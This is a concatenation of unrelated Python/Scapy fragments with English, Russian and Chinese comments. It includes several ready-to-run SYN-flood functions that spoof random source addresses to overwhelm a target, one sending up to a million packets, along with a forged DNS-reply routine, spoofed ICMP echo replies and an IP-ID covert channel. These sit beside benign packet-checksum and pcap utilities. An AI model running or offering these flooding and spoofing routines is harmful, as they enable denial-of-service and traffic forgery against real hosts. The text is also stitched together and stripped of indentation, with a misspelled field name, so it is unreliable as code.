def SYN_Flood(targetIP, targetPort, counter):
total = 0 # total number of packets sent to the target
print
"Packets are being sent to the target ..."
for x in range(0, counter):
s_port = randInt()
s_eq = randInt()
w_indow = randInt()
# randomly generate all of these values (s_port, s_eq, w_indow using randInt() function
IP_Packet = IP()
IP_Packet.src = randomIP()
# randomly generate IP address to be sending packets from
IP_Packet.dst = targetIP
TCP_Packet = TCP()
TCP_Packet.sport = s_port
TCP_Packet.dport = targetPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
send(IP_Packet / TCP_Packet, verbose=0)
total += 1
sys.stdout.write("\nTotal packets sent to target : %i\n" % total)
def SYN_Flood(t_ip, t_port):
print("Пакеты отправляются")
global stop_thread
stop_thread = True
while stop_thread:
global packets
ip_p = IP()
ip_p.src = randomIP() # записываем в поле ip источника случайный ip
#ip_p.src = "8.8.8.8"
ip_p.dst = t_ip # записываем ip сервера
tcp_p = TCP()
#tcp_p.sport = 234
tcp_p.sport = randint(
0, 6000) # записываем в поле port источника случайный port
tcp_p.dport = t_port # записываем port сервер
tcp_p.flags = "S" # устанавливаем флаг SYN
tcp_p.seq = randint(0,
9000) # устанавливаем случайный порядковый номер ?
tcp_p.window = randint(5000, 8191) # устанавливаем случайное окно ?
send(ip_p / tcp_p, verbose=False) # отправляем пакет
packets += 1
myapp.ui.packetsCount.setText(str(packets))
# print("Пакет {0} отправлен".format(i + 1))
packets = 0
myapp.ui.packetsCount.setText(str(packets))
def SYN_UDP_Flood(self, dstIP, dstPort, counter):
try:
total = 0
print("Packets are sending ...")
for x in range(0, int(counter)):
s_port = random.randint(1000, 9000)
s_eq = random.randint(1000, 9000)
w_indow = random.randint(1000, 9000)
IP_Packet = IP()
IP_Packet.src = ".".join(
map(str, (random.randint(0, 255) for _ in range(4))))
IP_Packet.dst = dstIP
# Created our own TCP packet
UDP_Packet = UDP()
UDP_Packet.sport = s_port
UDP_Packet.dport = int(dstPort)
UDP_Packet.flags = "S"
UDP_Packet.seq = s_eq
UDP_Packet.window = w_indow
send(IP_Packet / UDP_Packet, verbose=0)
total += 1
print("\nTotal packets sent: %i\n" % total)
print()
return 1
except:
return 0
def test_packet_process(packet):
"""
tests packet processing
"""
pkt = IP(packet.get_payload()
) #converts the raw packet to a scapy compatible string
qname = "hello.io"
ip = IP()
udp = UDP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
udp.sport = pkt[UDP].dport
udp.dport = pkt[UDP].sport
# here we get the new public ip address
solved_ip = "31.33.7.31" # I'm lazy, reader you might create a function to generate random IP :))
qd = pkt[UDP].payload
dns = DNS(id=qd.id,
qr=1,
qdcount=1,
ancount=1,
arcount=1,
nscount=1,
rcode=0)
dns.qd = qd[DNSQR]
dns.an = DNSRR(rrname=qname, ttl=257540, rdlen=4, rdata=solved_ip)
dns.ns = DNSRR(rrname=qname, ttl=257540, rdlen=4, rdata=solved_ip)
dns.ar = DNSRR(rrname=qname, ttl=257540, rdlen=4, rdata=solved_ip)
# write rule to NAT
print "Sending the fake DNS reply to %s:%s" % (ip.dst, udp.dport)
send(ip / udp / dns)
def cons_IP():
print("in ", cons_IP.__name__, " #######")
t_ip = IP(ttl=10)
t_ip.src = "127.0.0.1"
t_ip.dst = "192.168.1.1"
ls(t_ip)
print()
print()
def getTCPPacket(self):
"""
构造TCP数据包
:return:
"""
try:
ip_packet = IP()
ip_packet.version = int(self.entries[8].get())
ip_packet.ihl = int(self.entries[9].get())
ip_packet.tos = int(self.entries[10].get())
ip_packet.id = int(self.entries[11].get())
# ip_packet.flags = int(self.entries[12].get())
ip_packet.frag = int(self.entries[13].get())
ip_packet.ttl = int(self.entries[14].get())
# ip_packet.chksum = self.entries[15].get()
ip_packet.src = self.entries[16].get()
ip_packet.dst = self.entries[17].get()
tcp_packet = TCP()
tcp_packet.sport = int(self.entries[0].get())
tcp_packet.dport = int(self.entries[1].get())
tcp_packet.seq = int(self.entries[2].get())
tcp_packet.ack = int(self.entries[3].get())
tcp_packet.dataofs = int(self.entries[4].get())
tcp_packet.flags = int(self.entries[5].get())
tcp_packet.window = int(self.entries[6].get())
# tcp_packet.chksum = self.entries[7].get()
# scapy自动计算IP、TCP校验和
# 获得数据包的二进制值
pkg_raw = raw(ip_packet / tcp_packet)
tcp_packet_raw = pkg_raw[20:]
# 构造数据包,自动计算校验和
scapy_chksum_IP = IP(pkg_raw).chksum
scapy_chksum_tcp = TCP(tcp_packet_raw).chksum
print("scapy自动计算的TCP校验和为:%04x" % scapy_chksum_tcp)
# 手动计算TCP校验和
tcp_packet.chksum = 0
packet = ip_packet / tcp_packet
tcp_raw = raw(packet)[20:]
self_chksum = in4_chksum(socket.IPPROTO_TCP, packet[IP], tcp_raw)
print("手动计算的TCP校验和为:%04x" % self_chksum)
if self_chksum == scapy_chksum_tcp:
print("TCP验证和正确")
else:
print("TCP验证和不正确")
tcp_packet.chksum = scapy_chksum_tcp
self.entries[7].delete(0, END)
self.entries[7].insert(0, hex(scapy_chksum_tcp))
self.entries[15].delete(0, END)
self.entries[15].insert(0, hex(scapy_chksum_IP))
tcp_packet.show()
self.resultText.insert('end', tcp_packet.summary() + '\n')
self.resultText.insert('end', str(tcp_packet) + '\n')
return Ether() / ip_packet / tcp_packet
except Exception as e:
print(e.with_traceback())
finally:
pass
def getUDPPacket(self):
"""
构造UDP数据包
:param self:
:return:
"""
try:
ip_packet = IP()
ip_packet.version = int(self.entries[3].get())
ip_packet.ihl = int(self.entries[4].get())
ip_packet.tos = int(self.entries[5].get())
ip_packet.id = int(self.entries[6].get())
# ip_packet.flags = int(self.entries[7].get())
ip_packet.frag = int(self.entries[8].get())
ip_packet.ttl = int(self.entries[9].get())
# ip_packet.chksum = self.entries[10].get()
ip_packet.src = self.entries[11].get()
ip_packet.dst = self.entries[12].get()
udp_packet = UDP()
udp_packet.sport = int(self.entries[0].get())
udp_packet.dport = int(self.entries[1].get())
# udp_packet.chksum = int(self.entries[2].get())
# scapy自动计算IP、UDP校验和
# 获得数据包的二进制值
pkg_raw = raw(ip_packet / udp_packet)
udp_packet_raw = pkg_raw[20:]
# 构造数据包,自动计算校验和
scapy_chksum_IP = IP(pkg_raw).chksum
scapy_chksum_udp = UDP(udp_packet_raw).chksum
print("scapy自动计算的UDP校验和为:%04x" % scapy_chksum_udp)
# 手动计算UDP校验和
udp_packet.chksum = 0
packet = ip_packet / udp_packet
udp_raw = raw(packet)[20:]
self_chksum = in4_chksum(socket.IPPROTO_UDP, packet[IP], udp_raw)
print("手动计算的UDP校验和为:%04x" % self_chksum)
if self_chksum == scapy_chksum_udp:
print("UDP验证和正确")
else:
print("UDP验证和不正确")
udp_packet.chksum = scapy_chksum_udp
self.entries[2].delete(0, END)
self.entries[2].insert(0, hex(scapy_chksum_udp))
self.entries[10].delete(0, END)
self.entries[10].insert(0, hex(scapy_chksum_IP))
udp_packet.show()
self.resultText.insert('end', udp_packet.summary() + '\n')
self.resultText.insert('end', str(udp_packet) + '\n')
return Ether() / ip_packet / udp_packet
except Exception as e:
print(e.with_traceback())
finally:
pass
def print_pkt(pkt):
pkt.show()
a = IP()
a.src = pkt[IP].dst
a.dst = pkt[IP].src
b = pkt[Raw].load
b.type = 'echo-reply'
b.code = 0
b.id = pkt[ICMP].id
b.seq = pkt[ICMP].seq
p = a / b
send(p)
p.show()
def icmp_reply(pkt):
"""
Reply to the packet which the sniffer capture.
"""
if pkt[ARP].op == 1:
ip = IP()
ip.dst = pkt[ARP].psrc
ip.src = pkt[ARP].pdst
icmp = ICMP()
icmp.type = 0
send(ip / icmp)
def SYN_Flood(
dstip, dstport, packets
): # Takes and input for destination IP and ports with how many packets you want to send
print('Flooding !!!')
dstport = [int(i) for i in dstport]
for x in range(0, packets):
IP_pack = IP()
TCP_pack = TCP()
IP_pack.src = RandIP()
IP_pack.dst = dstip
TCP_pack.sport, TCP_pack.dport = random.randint(0, 65535), dstport
TCP_pack.flags, TCP_pack.seq, TCP_pack.window = "S", random.randint(
1, 1000), random.randint(1, 1000)
send(IP_pack / TCP_pack, verbose=0)
def start_interception_test():
pckts = []
pl = b'deadbeef'
for i in range(20):
pkt = IP()
pkt.src = i * 100
pkt.dst = i * 200
# pkt.payload = pl
pckts.append(pkt)
for i in range(len(pckts)):
time.sleep(.5)
q.put(pckts[i])
q.put(-1)
def foo(in_filename, out_filename):
# open the input file for reading
f = PcapReader(in_filename)
# open the output file for writing
o = PcapWriter(out_filename)
# read the first packet from the input file
p = f.read_packet()
# while we haven't processed the last packet
while p:
layer = p.firstlayer()
while not isinstance(layer, NoPayload):
if (type(layer) is IPv6):
new_layer = IP()
del new_layer.ihl
new_layer.ttl = layer.hlim
new_layer.proto = layer.nh
new_layer.src = ".".join(map(str, six2four(layer.src)))
new_layer.dst = ".".join(map(str, six2four(layer.dst)))
new_layer.add_payload(layer.payload)
prev_layer = layer.underlayer
del layer
prev_layer.remove_payload()
prev_layer.add_payload(new_layer)
if type(prev_layer) is Ether:
prev_layer.type = ETH_P_IP
layer = new_layer
if layer.default_fields.has_key('chksum'):
del layer.chksum
if layer.default_fields.has_key('len'):
del layer.len
# advance to the next layer
layer = layer.payload
# write the packet we just dissected into the output file
o.write(p)
# read the next packet
p = f.read_packet()
# close the input file
f.close()
# close the output file
o.close()
def reply(pkt):
"""
Reply to the packet which the sniffer capture.
"""
if pkt[ICMP].type == 8:
ip = IP()
ip.dst = pkt[IP].src
ip.src = pkt[IP].dst
icmp = ICMP()
icmp.id = pkt[ICMP].id
icmp.seq = pkt[ICMP].seq
icmp.type = 0
raw = Raw()
raw.load = pkt[Raw].load
send(ip / icmp / raw)
def sendSYN(target, port):
# creating packet
# insert IP header fields
tcp = TCP()
ip = IP()
#set source IP
ip.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
ip.dst = target
# insert TCP header fields
tcp = TCP()
#set source port as random valid port
tcp.sport = random.randint(1, 65535)
tcp.dport = port
#set SYN flag
tcp.flags = 'S'
send(ip / tcp)
return
def syn_flood(ip_dst, dport, amnt):
packet_deserved = 0
print("\nНачало отправки...")
for packet in range(0, amnt):
s_port, s_eq, w_indow = get_random_int(), get_random_int(), get_random_int()
IP_Packet = IP()
IP_Packet.src, IP_Packet.dst = get_random_IP(), ip_dst
TCP_Packet = TCP()
TCP_Packet.sport, TCP_Packet.dport = s_port, dport
TCP_Packet.flags = "S"
TCP_Packet.seq, TCP_Packet.window = s_eq, w_indow
send(IP_Packet / TCP_Packet, verbose=0)
packet_deserved += 1
print('\nВсего пакетов отправлено', packet_deserved)
def print_pkt(pkt):
if (pkt[ICMP].type == 8):
eth = Ether()
eth.dst = pkt[Ether].src
eth.src = pkt[Ether].dst
ip = IP()
ip.dst = pkt[IP].src
ip.src = pkt[IP].dst
ip.ihl = pkt[IP].ihl
icmp = ICMP()
icmp.id = pkt[ICMP].id
icmp.seq = pkt[ICMP].seq
icmp.type = 0
raw = Raw()
raw.load = pkt[Raw].load
send(eth / ip / icmp / raw)
def SYN_Flood(dstIP, dstPort, counter):
total = 0
avg_time = 0
print("Packets are sending ...")
attack_begin = time.process_time()
for x in range(0, counter):
s_port = randInt()
s_eq = randInt()
w_indow = randInt()
IP_Packet = IP()
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP
TCP_Packet = TCP()
TCP_Packet.sport = s_port
TCP_Packet.dport = dstPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
start = time.process_time()
send(IP_Packet / TCP_Packet, verbose=0)
time_per_packet = (time.process_time() - start)
# Write it in a file
with open('syns_results_p.txt', 'a') as f:
f.write(f'{x}, {time_per_packet}\n')
avg_time = avg_time+ time_per_packet
total += 1
attack_time = time.process_time() - attack_begin
avg_time = avg_time/total
with open('syns_results_p.txt', 'a') as f:
f.write(f'\nTotal time - {attack_time}')
f.write(f'\nAverage time - {avg_time}')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
f.write(f'\nFinishing time: {current_time}')
print(f"\nTotal packets sent: {total}\n")
def SYN_Flood(dstIP, dstPort):
total = 0
print("Packets are sending ...")
for x in range(0, 1000000):
s_port = randInt()
s_eq = randInt()
w_indow = randInt()
IP_Packet = IP()
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP
TCP_Packet = TCP()
TCP_Packet.sport = s_port
TCP_Packet.dport = dstPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow
send(IP_Packet / TCP_Packet, verbose=0)
print('one was sent')
total += 1
sys.stdout.write("\nTotal packets sent: %i\n" % total)
def run(self):
# There are two different ways you can go about pulling this off.
# You can either:
# - 1. Just open a socket to your target on any old port
# - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
#
# (Uncomment whichever method you'd like to use)
# Method 1 -
s = socket.socket()
s.connect((target, port))
# Methods 2 -
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def getICMPPacket(self):
"""
构造ICMP报文
:return:
"""
try:
icmp_packet = IP() / ICMP()
icmp_packet.version = int(self.entries[2].get())
icmp_packet.id = int(self.entries[3].get())
icmp_packet.flags = int(self.entries[4].get())
icmp_packet.frag = int(self.entries[5].get())
icmp_packet.ttl = int(self.entries[6].get())
# ip_packet.chksum = str(self.entries[7].get())
icmp_packet.src = str(self.entries[8].get())
icmp_packet.dst = str(self.entries[9].get())
icmp_packet.type = int(self.entries[0].get())
# icmp_packet.chksum = str(self.entries[1].get())
# 获得数据包的二进制值
pkg_raw = raw(icmp_packet)
# 构造数据包,自动计算校验和
icmp_packet = IP(pkg_raw)
# 去除数据包的IP首部,并构建ICMP对象,这样可以获得ICMP的校验和
pkg_icmp = pkg_raw[20:]
pkg_icmp = ICMP(pkg_icmp)
print("scapy自动计算的ICMP的校验和为:%04x" % pkg_icmp.chksum)
self.entries[1].delete(0, END)
self.entries[1].insert(0, hex(pkg_icmp.chksum))
self.entries[7].delete(0, END)
self.entries[7].insert(0, hex(icmp_packet.chksum))
icmp_packet.show()
self.resultText.insert('end', icmp_packet.summary() + '\n')
self.resultText.insert('end', str(icmp_packet) + '\n')
return Ether() / icmp_packet
except Exception as e:
print(e.with_traceback())
finally:
pass
def getIPPacket(self):
"""
构造IP数据包
:return:
"""
# chksum = self.entries[9].get()
try:
eth = Ether()
eth.src = self.entries[0].get()
eth.dst = self.entries[1].get()
eth.type = int(self.entries[2].get())
ip_packet = IP()
ip_packet.versionion = int(self.entries[3].get())
ip_packet.ihl = int(self.entries[4].get())
ip_packet.tos = int(self.entries[5].get())
ip_packet.len = int(self.entries[6].get())
ip_packet.id = int(self.entries[7].get())
ip_packet.flags = int(self.entries[8].get())
ip_packet.frag = int(self.entries[9].get())
ip_packet.ttl = int(self.entries[10].get())
ip_packet.proto = int(self.entries[11].get())
payload = self.entries[16].get()
ip_packet.src = self.entries[13].get()
ip_packet.dst = self.entries[14].get()
# 不含payload计算首部校验和
if payload == '':
print("无payload的IP报文")
ip_packet.show()
checksum_scapy = IP(raw(ip_packet)).chksum
# 自主计算验证IP首部检验和并进行填充
print("scapy自动计算的IP首部检验和是:%04x (%s)" %
(checksum_scapy, str(checksum_scapy)))
# 1.将IP首部和自动设置为0
ip_packet.chksum = 0
# 2.生成ip首部的数据字符串
x = raw(ip_packet)
ipString = "".join("%02x" % orb(x) for x in x)
# 3.将ip首部的数据字符串转换成字节数组
ipbytes = bytearray.fromhex(ipString)
# 4.调用校验和计算函数计算校验和
checksum_self = self.IP_headchecksum(ipbytes)
# 5.进行校验和验证
print("验证计算IP首部的检验和是:%04x (%s)" %
(checksum_self, str(checksum_self)))
# 含payload计算首部校验和
else:
print("含有payload的IP报文")
ip_packet = ip_packet / payload
ip_packet.show()
ip_packet.len = 20 + len(payload)
checksum_scapy = IP(raw(ip_packet)).chksum
print("scapy自动计算的IP首部检验和是:%04x (%s)" %
(checksum_scapy, str(checksum_scapy)))
ip_packet.chksum = 0
ip_packet.ihl = 5
print('\n 报文长度是:%s' % str(ip_packet.len))
x = raw(ip_packet)
ipString = "".join("%02x" % orb(x) for x in x)
ipbytes = bytearray.fromhex(ipString)
checksum_self = self.IP_headchecksum(ipbytes[0:ip_packet.ihl *
4])
print("验证计算IP首部的检验和是:%04x (%s)" %
(checksum_self, str(checksum_self)))
if checksum_self == checksum_scapy:
print("检验和正确")
else:
print("检验和不正确")
ip_packet.chksum = checksum_self
self.entries[12].delete(0, END)
self.entries[12].insert(0, hex(ip_packet.chksum))
ip_packet.show()
self.resultText.insert('end', ip_packet.summary() + '\n')
self.resultText.insert('end', str(ip_packet) + '\n')
return eth / ip_packet
except Exception as e:
print(e.with_traceback())
finally:
pass
from scapy.all import *
from scapy.layers.inet import IP, TCP
from scapy.layers.l2 import *
ip1 = IP()
ip1.src = "223.129.0.189"
ip1.dst = "223.129.0.190"
tcp1 = TCP()
tcp1.sport = 80
tcp1.dport = 81
packet1 = Ether() / ip1 / tcp1
packet1.show()
hexdump(packet1)
name1 = "tcp-opposite-five-tuple-1"
wrpcap("src/scapy/" + name1 + ".pcap", packet1)
ip2 = IP()
ip2.src = "223.129.0.190"
ip2.dst = "223.129.0.189"
tcp2 = TCP()
tcp2.sport = 81
tcp2.dport = 80
packet2 = Ether() / ip2 / tcp2
packet2.show()
hexdump(packet2)
name2 = "tcp-opposite-five-tuple-2"
wrpcap("src/scapy/" + name2 + ".pcap", packet2)
import time
import random
from ipaddress import IPv4Address
def random_ip_address():
bits = random.getrandbits(32) # generates an integer with 32 random bits
addr = IPv4Address(bits) # instances an IPv4Address object from those bits
return str(addr) # get the IPv4Address object's string representation
# ---------------MAIN-SCRIPT-----------------#
#results = open("syn_results_p.txt","a")
sum = 0
src_IP = random_ip_address()
src_PORT = 1234
dst_PORT = 80
ip = IP(src=[src_IP], dst=['10.0.2.8'])
SYN = TCP(sport=src_PORT, dport=dst_PORT, flags='S', seq=1000)
for i in range(0, 10 * 10000):
ip.src = random_ip_address()
start = time.time()
send(ip / SYN, verbose=0)
end = time.time()
delta = end - start
sum = sum + delta
print(str(i) + ":" + str(delta))
#results.write(str(i)+":"+str(delta)+"\n")
#results.write("AVG : "+str(delta)+"\n")
print("AVG : " + str(delta) + "\n")
results.close()
#!/usr/bin/env python3 from scapy.all import * from scapy.layers.inet import IP, ICMP """ Send ICMP packet from 10.9.0.4 to 10.9.0.1. """ a = IP(dst="10.9.0.1") a.src = '10.9.0.4' b = ICMP() send(a / b)
#! /usr/bin/env python3
from scapy.all import *
from scapy.layers.inet import IP,TCP
out_ip = IP()
# end of message flag
eom = ord("!") * 256
# first ask source and destination addrs
#out_ip.src = input("Source: ")
#out_ip.dst = input("Destination: ")
#loopback
out_ip.src = "127.0.0.1"
out_ip.dst ="127.0.0.1"
##### ENCODING
# ask usr for message to encode
msg = input("Message to send: ")
# loop to encode message - multiply each char by 256
for letter in msg:
encoded_letter = ord(letter) * 256
out_ip.id = encoded_letter
# send packet!
send(out_ip)
# finally send eom
out_ip.id = eom
send(out_ip)
